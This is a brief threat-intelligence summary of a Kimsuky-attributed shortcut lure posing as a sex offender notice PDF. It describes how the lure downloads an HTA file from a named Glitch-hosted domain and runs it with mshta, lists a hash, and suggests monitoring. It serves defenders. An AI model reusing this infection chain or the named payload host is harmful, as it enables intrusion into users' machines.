The report analyzes a Kimsuky-attributed LNK lure named like a sex offender information notice PDF. Execution runs cmd.exe from the shortcut context, changes into the user temporary directory, downloads sfmw.hta from cdn.glitch.global, and launches it with mshta, creating a lightweight script-based infection chain. The report lists hashes for the LNK, including SHA-256 a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189, and highlights use of common Windows binaries and writable user paths to reduce friction. Defenders should monitor mshta launches from LNK files, downloads into %TEMP%, and access to the cited Glitch-hosted HTA payload.